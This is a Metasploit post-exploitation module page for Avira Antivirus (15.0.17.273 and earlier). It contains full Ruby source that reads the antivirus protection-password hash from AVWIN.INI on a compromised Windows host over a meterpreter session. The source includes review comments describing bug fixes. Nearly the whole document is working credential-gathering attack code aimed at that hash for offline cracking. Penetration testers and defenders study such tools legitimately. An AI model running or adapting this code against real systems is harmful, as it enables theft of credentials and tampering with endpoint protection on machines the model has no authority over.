Windows Gather Avira Password Extraction

2016-07-26T12:03:51
ID MSF:POST/WINDOWS/GATHER/CREDENTIALS/AVIRA_PASSWORD
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module extracts the weakly hashed password which is used to protect an Avira Antivirus (<= 15.0.17.273) installation. The hash is read from the `[COMMON]` section of `C:\ProgramData\Avira\Antivirus\CONFIG\AVWIN.INI` on the compromised host and is reported as an MD5 of the Unicode password; since the password is limited to 20 characters and the hash is unsalted MD5, it is a candidate for offline cracking rather than something the module decrypts.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/parser/ini'

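class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry

  # Default location of the Avira configuration file on the target. The
  # protection-password hash lives in its [COMMON] section under "Password".
  # NOTE(review): only the C:\ProgramData default is probed; an installation
  # with a relocated %ProgramData% is not found by this module.
  DEFAULT_INI_PATH = 'C:\\ProgramData\\Avira\\Antivirus\\CONFIG\\AVWIN.INI'.freeze

  def initialize(info={})
    super( update_info( info,
        'Name'          => 'Windows Gather Avira Password Extraction',
        'Description'   => %q{
          This module extracts the weakly hashed password
          which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [ 'Robert Kugler / robertchrk'],
        'Platform'      => [ 'win' ],
        'SessionTypes'  => [ 'meterpreter' ]
      ))
  end

  # Entry point: probe the default AVWIN.INI location and, when the file is
  # present, pull the MD5(Unicode) hash of the protection password out of it.
  def run
    print_status("Checking default location...")
    check_programdata(DEFAULT_INI_PATH)
  end

  # Stat +path+ on the target and, if it exists, hand it to get_ini.
  #
  # Only the stat call is guarded. The original wrapped get_ini in the same
  # bare rescue, so a read or parse failure inside it was reported as the
  # file being absent, hiding the real error from the operator.
  #
  # @param path [String] absolute Windows path of the INI file to inspect
  # @return [void]
  def check_programdata(path)
    begin
      client.fs.file.stat(path)
    rescue => e
      print_status("#{path} not found ....")
      # Surface the underlying reason (permission denied, channel error, ...)
      # in verbose mode instead of swallowing it.
      vprint_error("stat failed: #{e.class}: #{e.message}")
      return
    end

    print_status("Found file at #{path}")
    get_ini(path)
  end

  # Read +filename+ from the target, parse it as an INI file and print the
  # hashed protection password found in [COMMON] -> Password.
  #
  # The remote file handle is always closed, even when the read raises; the
  # original never closed it and leaked one meterpreter channel per run.
  #
  # @param filename [String] absolute Windows path of AVWIN.INI
  # @return [void]
  def get_ini(filename)
    config = client.fs.file.new(filename, 'r')
    begin
      raw = config.read
    ensure
      config.close
    end

    if raw.nil? || raw.empty?
      print_error("#{filename} is empty or could not be read")
      return
    end

    # The INI is normalised to ASCII before parsing, as in the original;
    # Rex::Parser::Ini returns an empty hash when it cannot make sense of it.
    ini = Rex::Parser::Ini.from_s(Rex::Text.to_ascii(raw))
    if ini.empty?
      print_error("Unable to parse file")
      return
    end

    print_status("Processing configuration file...")

    # Both the section and the key may be absent (e.g. no password has been
    # set); the original dereferenced them unconditionally and crashed with
    # NoMethodError on nil instead of reporting the condition.
    section = ini['COMMON']
    passwd = section.nil? ? nil : section['Password']
    # The parser keeps the surrounding quotes, so strip them before reporting.
    passwd = passwd.to_s.delete('"')
    if passwd.empty?
      print_error("No Password entry found in [COMMON]; the installation may not be password protected")
      return
    end

    print_good("MD5(Unicode) hash found: #{passwd}")
    print_good("Info: Password length is limited to 20 characters.")
  end
end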